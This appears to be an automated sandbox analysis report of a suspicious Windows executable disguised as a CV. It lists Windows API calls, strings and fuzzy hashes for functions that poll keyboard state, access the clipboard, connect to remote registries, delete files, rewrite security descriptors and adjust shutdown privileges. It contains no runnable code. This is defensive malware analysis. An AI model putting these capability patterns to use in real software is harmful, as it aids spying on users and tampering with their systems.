                                                                                        • __swprintf.LIBCMT ref: 003CF767
                                                                                        • __swprintf.LIBCMT ref: 003CF7BB
                                                                                          • Part of subcall function 003A172B: __woutput_l.LIBCMT ref: 003A1784
                                                                                        • __swprintf.LIBCMT ref: 003CF809
                                                                                        • __swprintf.LIBCMT ref: 003CF858
                                                                                        • __swprintf.LIBCMT ref: 003CF8A7
                                                                                        • __swprintf.LIBCMT ref: 003CF8F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 835046349-2428617273
                                                                                        • Opcode ID: 5fc674058bd0b2055b49d50ca199f4330bf3975f22b03ce331a89d8e17dc678c
                                                                                        • Instruction ID: 594c34251c4fc56680fe876ddc1b94d358bb65d901ead6831584894b9280e5e4
                                                                                        • Opcode Fuzzy Hash: 5fc674058bd0b2055b49d50ca199f4330bf3975f22b03ce331a89d8e17dc678c
                                                                                        • Instruction Fuzzy Hash: 81A121B2408344ABC716FBA4C985EAFB7ECAF98704F440C6EF585C6151EB34D949CB62
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003D1B50
                                                                                        • _wcscmp.LIBCMT ref: 003D1B65
                                                                                        • _wcscmp.LIBCMT ref: 003D1B7C
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 003D1B8E
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 003D1BA8
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003D1BC0
                                                                                        • FindClose.KERNEL32(00000000), ref: 003D1BCB
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003D1BE7
                                                                                        • _wcscmp.LIBCMT ref: 003D1C0E
                                                                                        • _wcscmp.LIBCMT ref: 003D1C25
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D1C37
                                                                                        • SetCurrentDirectoryW.KERNEL32(004339FC), ref: 003D1C55
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003D1C5F
                                                                                        • FindClose.KERNEL32(00000000), ref: 003D1C6C
                                                                                        • FindClose.KERNEL32(00000000), ref: 003D1C7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1803514871-438819550
                                                                                        • Opcode ID: bcea57a3a2745d93f6b73b07ed34b5498ea82a61308cf9bdcfc1a9db4998b146
                                                                                        • Instruction ID: a04e05d790b42c94c768af08b9fc812c44dd309b744ba1f8c08769ec1684c44a
                                                                                        • Opcode Fuzzy Hash: bcea57a3a2745d93f6b73b07ed34b5498ea82a61308cf9bdcfc1a9db4998b146
                                                                                        • Instruction Fuzzy Hash: 3731A573A40219BBDB16AFE0EC49BDE77AC9F05321F1401A7F811E3190EB74DA458A68
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003D1CAB
                                                                                        • _wcscmp.LIBCMT ref: 003D1CC0
                                                                                        • _wcscmp.LIBCMT ref: 003D1CD7
                                                                                          • Part of subcall function 003C6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003C6BEF
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003D1D06
                                                                                        • FindClose.KERNEL32(00000000), ref: 003D1D11
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003D1D2D
                                                                                        • _wcscmp.LIBCMT ref: 003D1D54
                                                                                        • _wcscmp.LIBCMT ref: 003D1D6B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D1D7D
                                                                                        • SetCurrentDirectoryW.KERNEL32(004339FC), ref: 003D1D9B
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003D1DA5
                                                                                        • FindClose.KERNEL32(00000000), ref: 003D1DB2
                                                                                        • FindClose.KERNEL32(00000000), ref: 003D1DC2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1824444939-438819550
                                                                                        • Opcode ID: 2b7a8b2ec7adfe639588a67cfcb0087ff860f2d39431d7b561ec726b35301caa
                                                                                        • Instruction ID: b06267c29489664c8f5db595da7b77c2cbe1aeedaa1ef6f2d00dd6c21fd6c603
                                                                                        • Opcode Fuzzy Hash: 2b7a8b2ec7adfe639588a67cfcb0087ff860f2d39431d7b561ec726b35301caa
                                                                                        • Instruction Fuzzy Hash: E8310873900619BBCF12AFA0ED09BEE77AD9F45320F150567F801A7291DB70DE458A68
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset
                                                                                        • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                        • API String ID: 2102423945-2023335898
                                                                                        • Opcode ID: bfbc7f97cf46da1b8befc921d9556efa160c113f60a55a8965861f12c41050a6
                                                                                        • Instruction ID: ee58fcd15b908d1c6460a122254ba1865f9bffc0369d5ca345b3b446fb6274d4
                                                                                        • Opcode Fuzzy Hash: bfbc7f97cf46da1b8befc921d9556efa160c113f60a55a8965861f12c41050a6
                                                                                        • Instruction Fuzzy Hash: FE82BF71D04219CFCF26DF98C8807ADB7B2BF45310F2581AAD959AB391E774AD85CB80
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 003D09DF
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 003D09EF
                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003D09FB
                                                                                        • __wsplitpath.LIBCMT ref: 003D0A59
                                                                                        • _wcscat.LIBCMT ref: 003D0A71
                                                                                        • _wcscat.LIBCMT ref: 003D0A83
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003D0A98
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D0AAC
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D0ADE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D0AFF
                                                                                        • _wcscpy.LIBCMT ref: 003D0B0B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003D0B4A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                        • String ID: *.*
                                                                                        • API String ID: 3566783562-438819550
                                                                                        • Opcode ID: 936ff5324cd762e7e00f7a65b489e002561254b6c8d16baee5ed42b1297dbee5
                                                                                        • Instruction ID: a3b1e58a4e73a896dafd20ddfecb6a0508dc34ae9b1a027a3df4de81acb06991
                                                                                        • Opcode Fuzzy Hash: 936ff5324cd762e7e00f7a65b489e002561254b6c8d16baee5ed42b1297dbee5
                                                                                        • Instruction Fuzzy Hash: C5618A725083059FC715EF60D884AAEB3E8FF89310F04496EF989DB251DB31E949CB92
                                                                                        APIs
                                                                                          • Part of subcall function 003BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003BABD7
                                                                                          • Part of subcall function 003BABBB: GetLastError.KERNEL32(?,003BA69F,?,?,?), ref: 003BABE1
                                                                                          • Part of subcall function 003BABBB: GetProcessHeap.KERNEL32(00000008,?,?,003BA69F,?,?,?), ref: 003BABF0
                                                                                          • Part of subcall function 003BABBB: HeapAlloc.KERNEL32(00000000,?,003BA69F,?,?,?), ref: 003BABF7
                                                                                          • Part of subcall function 003BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003BAC0E
                                                                                          • Part of subcall function 003BAC56: GetProcessHeap.KERNEL32(00000008,003BA6B5,00000000,00000000,?,003BA6B5,?), ref: 003BAC62
                                                                                          • Part of subcall function 003BAC56: HeapAlloc.KERNEL32(00000000,?,003BA6B5,?), ref: 003BAC69
                                                                                          • Part of subcall function 003BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003BA6B5,?), ref: 003BAC7A
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003BA6D0
                                                                                        • _memset.LIBCMT ref: 003BA6E5
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003BA704
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 003BA715
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 003BA752
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003BA76E
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 003BA78B
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003BA79A
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 003BA7A1
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003BA7C2
                                                                                        • CopySid.ADVAPI32(00000000), ref: 003BA7C9
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003BA7FA
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003BA820
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003BA834
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: 07c48c808fbaf07f08517d8fde4aef9a2c484ef33830663868158e9098511cea
                                                                                        • Instruction ID: 5d6ed860fc2b25ff5c90ac49ab622b1cb0737f9cae33a1036d6bc988ca0f3a69
                                                                                        • Opcode Fuzzy Hash: 07c48c808fbaf07f08517d8fde4aef9a2c484ef33830663868158e9098511cea
                                                                                        • Instruction Fuzzy Hash: F3515B71900A09ABDF01DFA1DD45EEEBBB9FF44308F048129EA15EA690DB349A05CB61
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: B$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$BBB B
                                                                                        • API String ID: 0-3391377756
                                                                                        • Opcode ID: 3cb229eb03df7c5d60d2019c419b35a873c561154fe18e5f305df1ac9734a727
                                                                                        • Instruction ID: 34df2477ae5e490676d871f4a243c77651fd2f64467e69fa418aa8da05048636
                                                                                        • Opcode Fuzzy Hash: 3cb229eb03df7c5d60d2019c419b35a873c561154fe18e5f305df1ac9734a727
                                                                                        • Instruction Fuzzy Hash: DD727E71E043199BDB25DF59C8807AEB7B5BF48310F2481ABE805EB2C0DB749E41DB95
                                                                                        APIs
                                                                                          • Part of subcall function 003C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C5FA6,?), ref: 003C6ED8
                                                                                          • Part of subcall function 003C72CB: GetFileAttributesW.KERNEL32(?,003C6019), ref: 003C72CC
                                                                                        • _wcscat.LIBCMT ref: 003C6441
                                                                                        • __wsplitpath.LIBCMT ref: 003C645F
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003C6474
                                                                                        • _wcscpy.LIBCMT ref: 003C64A3
                                                                                        • _wcscat.LIBCMT ref: 003C64B8
                                                                                        • _wcscat.LIBCMT ref: 003C64CA
                                                                                        • DeleteFileW.KERNEL32(?), ref: 003C64DA
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003C64EB
                                                                                        • FindClose.KERNEL32(00000000), ref: 003C6506
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 2643075503-1173974218
                                                                                        • Opcode ID: 2f30f77c0b511697c078f49e4d2cb922dc15715b39ec996779a9f2b7fa71310a
                                                                                        • Instruction ID: 50729175a36ba03338fcc3a14ca92d79a33b8bc58629f1ba6adaa35bdb5c5c5d
                                                                                        • Opcode Fuzzy Hash: 2f30f77c0b511697c078f49e4d2cb922dc15715b39ec996779a9f2b7fa71310a
                                                                                        • Instruction Fuzzy Hash: EA3184B24083849AC722DBE48885EDBB7DCAF56310F44492EF5D9C7141EA35D90D8767
                                                                                        APIs
                                                                                          • Part of subcall function 003E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003E2BB5,?,?), ref: 003E3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E328E
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003E332D
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003E33C5
                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003E3604
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003E3611
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1240663315-0
                                                                                        • Opcode ID: f127149515db203cef2689a5e4290ef533a8d2decb7a1462847e3b75cf00375b
                                                                                        • Instruction ID: e1e4935becd8af4f98696acc9f97018edc7551caae226c844afd2dabe0bb5a77
                                                                                        • Opcode Fuzzy Hash: f127149515db203cef2689a5e4290ef533a8d2decb7a1462847e3b75cf00375b
                                                                                        • Instruction Fuzzy Hash: 39E17D35604210AFCB16DF29C995E2ABBE8FF89714F04896DF44ADB2A1DB30ED05CB51
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 003C2B5F
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 003C2BE0
                                                                                        • GetKeyState.USER32(000000A0), ref: 003C2BFB
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 003C2C15
                                                                                        • GetKeyState.USER32(000000A1), ref: 003C2C2A
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 003C2C42
                                                                                        • GetKeyState.USER32(00000011), ref: 003C2C54
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 003C2C6C
                                                                                        • GetKeyState.USER32(00000012), ref: 003C2C7E
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 003C2C96
                                                                                        • GetKeyState.USER32(0000005B), ref: 003C2CA8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: ae69fdcb3efee71981cd8bdcf83d079921e780837f147a6f6eb0d12481deb338
                                                                                        • Instruction ID: e323af11e24412e67e147db21368b1151ad9cf24d6aaa4308698c04934f3e5df
                                                                                        • Opcode Fuzzy Hash: ae69fdcb3efee71981cd8bdcf83d079921e780837f147a6f6eb0d12481deb338
                                                                                        • Instruction Fuzzy Hash: BB41A4349047C96DFF369B648904BABBEA06B11344F05C05DD9C6962C2DFA49DC8C7A2
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1737998785-0
                                                                                        • Opcode ID: d5f2cb13243d4d425a3a52242962237ab83cf7a8ae1d6b4ded8da709fa3fc837
                                                                                        • Instruction ID: 12fa4e0bda6b024538136bab21097aa54059a3c66b76d3e6a81b439f04edd320
                                                                                        • Opcode Fuzzy Hash: d5f2cb13243d4d425a3a52242962237ab83cf7a8ae1d6b4ded8da709fa3fc837
                                                                                        • Instruction Fuzzy Hash: 4821B736700110AFDB12AF54ED49B2D77A9FF44710F05842AF91ADB261CB35EC008F54
                                                                                        APIs
                                                                                          • Part of subcall function 003B9ABF: CLSIDFromProgID.OLE32 ref: 003B9ADC
                                                                                          • Part of subcall function 003B9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 003B9AF7
                                                                                          • Part of subcall function 003B9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 003B9B05
                                                                                          • Part of subcall function 003B9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 003B9B15
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 003DC235
                                                                                        • _memset.LIBCMT ref: 003DC242
                                                                                        • _memset.LIBCMT ref: 003DC360
                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 003DC38C
                                                                                        • CoTaskMemFree.OLE32(?), ref: 003DC397
                                                                                        Strings
                                                                                        • NULL Pointer assignment, xrefs: 003DC3E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                        • String ID: NULL Pointer assignment
                                                                                        • API String ID: 1300414916-2785691316
                                                                                        • Opcode ID: 9f0625fc8623b1e980ac387495148e914d572e2cc8b4d77a10303089e41b7693
                                                                                        • Instruction ID: e3ba64d4e91383d607af9b52dda6e51e462c8326a81bdec0d07b359ea119a27a
                                                                                        • Opcode Fuzzy Hash: 9f0625fc8623b1e980ac387495148e914d572e2cc8b4d77a10303089e41b7693
                                                                                        • Instruction Fuzzy Hash: 47915E72D10219ABDF12EF95DC51EDEBBB8EF08310F10815AF515AB281DB709A45CFA0
                                                                                        APIs
                                                                                          • Part of subcall function 003BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003BB180
                                                                                          • Part of subcall function 003BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003BB1AD
                                                                                          • Part of subcall function 003BB134: GetLastError.KERNEL32 ref: 003BB1BA
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 003C7A0F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                        • API String ID: 2234035333-194228
